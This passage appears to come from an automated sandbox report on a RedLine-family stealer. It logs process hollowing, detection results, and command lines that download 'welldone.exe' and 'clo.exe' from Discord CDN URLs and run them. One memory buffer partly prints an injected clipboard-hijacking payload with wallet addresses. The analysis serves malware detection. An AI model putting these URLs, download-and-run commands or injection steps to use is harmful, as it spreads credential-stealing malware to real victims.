RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Reader 9 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 300 called NtSetContextThread to modify thread in remote process 2472
NtSetContextThread July 31, 2021, 1:27 p.m.	registers.eip: 1997996484 registers.esp: 4062380 registers.edi: 0 registers.eax: 4200777 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001b4 process_identifier: 2472	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2512 resumed a thread in remote process 2692
Process injection	Process 2576 resumed a thread in remote process 2712
Process injection	Process 2692 resumed a thread in remote process 2360
Process injection	Process 2712 resumed a thread in remote process 300
Process injection	Process 300 resumed a thread in remote process 2472
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000234 suspend_count: 1 process_identifier: 2692	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000000000000023c suspend_count: 1 process_identifier: 2712	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 2360	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 300	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2472	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 52 events)

Time & API	Arguments	Status	Return
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000674 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2032	1	0
NtGetContextThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2032	1	0
NtGetContextThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2032	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000005ec suspend_count: 1 process_identifier: 2032	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2516 thread_handle: 0x000007d4 process_identifier: 2512 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\mine.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\mine.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\mine.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007dc	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000730 suspend_count: 1 process_identifier: 2032	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2580 thread_handle: 0x000007dc process_identifier: 2576 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\clip.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\clip.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\clip.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007f4	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2512	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2696 thread_handle: 0x0000000000000234 process_identifier: 2692 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000000000000023c	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000234 suspend_count: 1 process_identifier: 2692	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000000000000d8 suspend_count: 1 process_identifier: 2576	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2716 thread_handle: 0x000000000000023c process_identifier: 2712 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000260	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000000000000023c suspend_count: 1 process_identifier: 2712	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2880 thread_handle: 0x000000000000006c process_identifier: 2876 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2988 thread_handle: 0x0000000000000068 process_identifier: 2984 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000078	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 3068 thread_handle: 0x000000000000000c process_identifier: 3064 current_directory: C:\Users\test22\AppData\Local\Temp\2741 filepath: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe" "welldone.exe" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2364 thread_handle: 0x0000000000000078 process_identifier: 2360 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\2741\welldone.exe track: 1 command_line: welldone.exe filepath_r: C:\Users\test22\AppData\Local\Temp\2741\welldone.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 2360	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 1988 thread_handle: 0x0000000000000068 process_identifier: 1164 current_directory: C:\Users\test22\AppData\Local\Temp\2741 filepath: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2912 thread_handle: 0x000000000000006c process_identifier: 2908 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2968 thread_handle: 0x0000000000000068 process_identifier: 2964 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000078	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2092 thread_handle: 0x000000000000000c process_identifier: 1716 current_directory: C:\Users\test22\AppData\Local\Temp\2741 filepath: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe" "clo.exe" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2096 thread_handle: 0x0000000000000078 process_identifier: 300 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\2741\clo.exe track: 1 command_line: clo.exe filepath_r: C:\Users\test22\AppData\Local\Temp\2741\clo.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 300	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2476 thread_handle: 0x0000000000000068 process_identifier: 2484 current_directory: C:\Users\test22\AppData\Local\Temp\2741 filepath: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2360	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2360	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2360	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 300	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 300	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2464 thread_handle: 0x000001b4 process_identifier: 2472 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\2741\clo.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000001b8	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 300	1	0
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 13893632 process_identifier: 2472 process_handle: 0x000001b8		3221225497
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2472 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001b8	1	0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: base_address: 0x00401000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: (:HPG2A/CLP/05/RYS1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb243DBpxVQ1kdYoJbWwux2Bfz54BfMB5Z2CQ4bc1qq3e09ltqvuzg903dxs7qhhajkel95rzwu4f2y2LaMw5ctk956V3hrtqfco6EzYzWioaGtQRrMPeYRpxQTaWpxt6RuXwqtf3T3FzWFBfbP2ltc1qwjd79y7pk34qunyk8zpz3dllekd7x54pvemhaa0x1c75A4Abe39e8F2984a1c66A898BF7E0b5c3E7E100000L0000T00MON00000000000000000000000LaMw5ctk956V3hrtqfco6EzYzWioaGtQRr00000000000000W000000084gR9n7jyYwQjW3ccMXuB1MpQaNMJ3AsKUzxDTaK9eWr2hch4ZqF18aAfCxVWQiF8G8NSL33xksEL98WFhLgXPLjQNFpwDsD7G1qQZYtFg4tJxtGRpZTMP5id2zd8sfeCaddr1q9xxn652n0wh0pk3h6guecvh6pxrkgp06rlm80tvsxpqkzqh0zxr9yhqkaawf34l8k8w0cdac0k6cljggt9jtftwmz3q8826j9Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPEZ1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb24t1YyT26xv4ZAHWTxqqHUoWcW9NhZ7SQoYMjbnb1g9wjgxzzgksqmyfsnppeqgr8yj66zwj8ld90mjkernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard @ #@`"@($@&@¸%@°!@h!@à#@8 @È @ @p%@ø$@"@ !@¡Æî` ´$)$¡Æî`GCTLá.text$mn .idata$5 .rdata$)´.rdata$zzzdbgØ).idata$2ì).idata$3.idata$4T.idata$60L.bss^* (:HP*ÄLoadLibraryW®GetProcAddress^ExitProcess}Sleep4GlobalFreeKERNEL32.dll base_address: 0x00402000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: base_address: 0x00403000 process_identifier: 2472 process_handle: 0x000001b8		0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: Ä0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0«0°0¶0¼0Á0Ç0Í0Ò0Ø0Þ0ã0é0ï0ô0ú0111111%1*10161;1A1G1L1S1X1_1d1k1s1z1111111£1¨1®1´1¹1À1È1Ï1×1Þ1ã1ê1ï1ö1û1222222#2)2.242:2?2E2K2R2Û2í2þ233$3=3P3h333¢3¯3»3È3á3í34%424K4Z4444¸4Ê4Ø4å4ò455'5<5J5W5d5p5}55¢5Õ5â5ï56!6:6S6l666·6Ð6Ü67(747V7c7p777¥7±7Ð7Ý7ê7ù788.8J8W8d8s888º8Å8Ì8Ö8Þ8è8ñ8÷8þ89 9-9:9@9X9b9h9w99¥9 :?:h::::ª:a;n;; ;Õ;<3<±<Ê<Ö<5=B=O=\=q=Ð=Ý=ê=÷=>ª>·>Ä>Ñ> (¬8°8´8¸8¼8À8Ä8È8Ì8Ð8Ô8Ø8Ü8à8ä8è8 base_address: 0x00404000 process_identifier: 2472 process_handle: 0x000001b8	1	1
NtGetContextThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000001b4	1	0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2472 process_handle: 0x000001b8	1	1

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Bulz.563852
FireEye	Generic.mg.08ddca87b625734e
McAfee	GenericRXOY-GA!08DDCA87B625
Sangfor	Trojan.Win32.Save.a
Arcabit	Trojan.Bulz.D89A8C
Cyren	W32/MSIL_Agent.BJO.gen!Eldorado
ESET-NOD32	a variant of MSIL/Spy.Agent.DFY
APEX	Malicious
ClamAV	Win.Malware.Bulz-9880537-0
Kaspersky	HEUR:Trojan-PSW.MSIL.Reline.gen
BitDefender	Gen:Variant.Bulz.563852
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Gen:Variant.Bulz.563852
Sophos	Mal/Reline-B
DrWeb	Trojan.PWS.StealerNET.109
McAfee-GW-Edition	GenericRXOY-GA!08DDCA87B625
Emsisoft	Trojan-Spy.Agent (A)
Ikarus	Trojan-Spy.MSIL.Agent
Microsoft	PWS:MSIL/RedLine.GG!MTB
GData	MSIL.Trojan.PSE.GAWPT8
Cynet	Malicious (score: 100)
AhnLab-V3	Infostealer/Win.RedLine.C4565803
VBA32	TScope.Trojan.MSIL
ALYac	Gen:Variant.Bulz.563852
MAX	malware (ai score=87)
Malwarebytes	Spyware.PasswordStealer
Rising	Stealer.Agent!1.D483 (CLASSIC)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.DFY!tr.spy
BitDefenderTheta	Gen:NN.ZemsilF.34050.gm0@aihOvOp
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/GdSda.A

@sc4lly1337.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All